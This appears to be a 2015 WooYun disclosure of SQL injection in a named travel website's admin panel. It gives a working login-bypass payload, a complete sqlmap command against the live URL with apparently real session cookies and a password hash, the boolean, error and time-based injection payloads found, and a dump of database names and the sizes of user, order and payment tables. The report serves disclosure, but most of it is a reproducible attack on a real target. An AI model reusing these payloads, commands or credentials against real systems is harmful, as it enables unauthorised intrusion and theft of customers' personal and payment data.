
Vulnerability Summary

Defect ID: wooyun-2015-0139559

Title: Kaiyuan Travel website SQL injection leaks a large amount of user data

Vendor: kaiyuan.eu

Author: Me_Fortune

Submitted: 2015-09-07 17:15

Fixed: 2015-09-12 17:16

Published: 2015-09-12 17:16

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org. For questions or help, contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2015-09-07: Details sent to the vendor, awaiting vendor response
2015-09-12: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

1. Searched WooYun for weak passwords and saw this:

WooYun: 开元旅行网后台弱口令导致订单泄露 (Kaiyuan Travel back-end weak password leads to order data leak)

So I fuzzed subdomains and found an admin panel.

2. Admin login page:

http://dhl.kaiyuan.eu/admin.php?action=login

Payload:

1' or '1'='1

Two injection points, one GET and one POST.

I.

1.

sqlmap.py -u "http://dhl.kaiyuan.eu/admin.php?action=plus_center&plus=book_man&read=b.id&getnew=1&order_export=25830" --cookie "Hm_lvt_58db26aba9239de594be5994f13e63e3=1441508872,1441608262,1441614146,1441614165; __utma=246661406.1888963922.1441092792.1441608262.1441614147.6; __utmz=246661406.1441614147.6.3.utmcsr=wooyun.org|utmccn=(referral)|utmcmd=referral|utmcct=/corps/%E5%BE%B7%E5%9B%BD%E5%BC%80%E5%85%83; pgv_pvi=4010238976; __utma=96885962.2119707681.1441112523.1441165202.1441608507.3; __utmz=96885962.1441112523.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CNZZDATA2923558=cnzz_eid%3D345566589-1441112544-%26ntime%3D1441614173; Hm_lpvt_58db26aba9239de594be5994f13e63e3=1441614165; __utmc=246661406; pgv_si=s1992612864; PHPSESSID=vn2qhd08vo1m9mvr2nd50g9ur5; __jsluid=90192e1357656f0b01c452b014e6b349; cod=49.48.44.45.46.11.47.34.2128812174.2128812234.2128812382.2128812429; csd=2145015660; __utmc=96885962; IESESSION=alive; __utmb=246661406.2.10.1441614147; __utmt=1; lan=zh_CN; bianyou[suid]=10; bianyou[pass]=456c827fb612025052d0cf2e8a6f194e"


2.

Parameter: plus (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=plus_center&plus=book_man%' AND 6587=6587 AND '%'='&read=b.id&getnew=1&order_export=25830
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: action=plus_center&plus=book_man%' AND (SELECT 1400 FROM(SELECT COUNT(*),CONCAT(0x717a6a7171,(SELECT (ELT(1400=1400,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&read=b.id&getnew=1&order_export=25830
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: action=plus_center&plus=book_man%' AND SLEEP(5) AND '%'='&read=b.id&getnew=1&order_export=25830
---
back-end DBMS: MySQL 5.0


3.

available databases [11]:
[*] chinesediapers
[*] dhl
[*] fitdiapers
[*] fitsandstone
[*] hi6go
[*] information_schema
[*] kytest
[*] kytour
[*] mysql
[*] test
[*] tour


4. Only dumped the table list of one database; did not look at the rest.

Database: dhl
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| dhl_integral | 25476 |
| dhl_order_detail | 22628 |
| dhl_goods | 22499 |
| dhl_record | 22226 |
| dhl_order | 12105 |
| dhl_order_base | 11729 |
| dhl_order_bpost | 10277 |
| dhl_alipay_data | 7495 |
| dhl_user | 6506 |


II. Injection in the "add link" form

[screenshot: 1.jpg]

[screenshot: 2.jpg]

Proof of vulnerability:

Fix recommendation:

Copyright notice: when reposting, please credit the source as Me_Fortune@WooYun


Vendor Response

Vendor response:

Severity: No impact, vendor ignored

Ignored on: 2015-09-12 17:16

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet